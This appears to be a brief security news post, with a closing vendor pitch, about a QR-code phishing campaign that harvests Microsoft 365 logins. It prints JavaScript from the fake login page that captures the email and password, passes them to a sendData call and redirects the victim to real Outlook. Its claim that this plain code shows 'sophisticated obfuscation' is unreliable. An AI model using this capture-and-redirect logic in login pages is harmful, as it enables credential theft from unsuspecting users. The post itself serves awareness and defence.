Malicious actors deploy intricate QR codes to phish Microsoft 365 login credentials

A sophisticated phishing campaign is exploiting QR codes to steal Microsoft 365 login credentials, posing a significant threat to corporate users. Attackers send emails that appear to be from Microsoft or IT departments, containing QR codes that redirect victims to convincing fake login pages. This method bypasses typical email security, as QR codes are not scanned for malicious URLs like traditional links. The fake login pages use JavaScript to validate email formats, enhancing their credibility. Researchers have identified a surge in these attacks, particularly impacting the financial and healthcare sectors. The campaign utilizes complex redirection chains and obfuscated code to conceal its malicious activity, often leaving victims unaware of the credential theft.

Examination of the phishing site’s source code reveals sophisticated obfuscation techniques:-

function validateCredentials() {
  const email = document.getElementById('email').value;
  const password = document.getElementById('password').value;
  if(email.match(/^[^\s@]+@[^\s@]+\.[^\s@]+$/) && password.length > 5) {
    sendData(email, password);
    window.location = "https://outlook.office.com/mail/";
  } else {
    document.getElementById('error-message').style.display = 'block';
  }
}

A trusted Attack Surface tool can help identify your organisation's credentials that have been leaked on the Darkweb.

Get in touch today to discuss how we can support you with the right tool to remain complaint!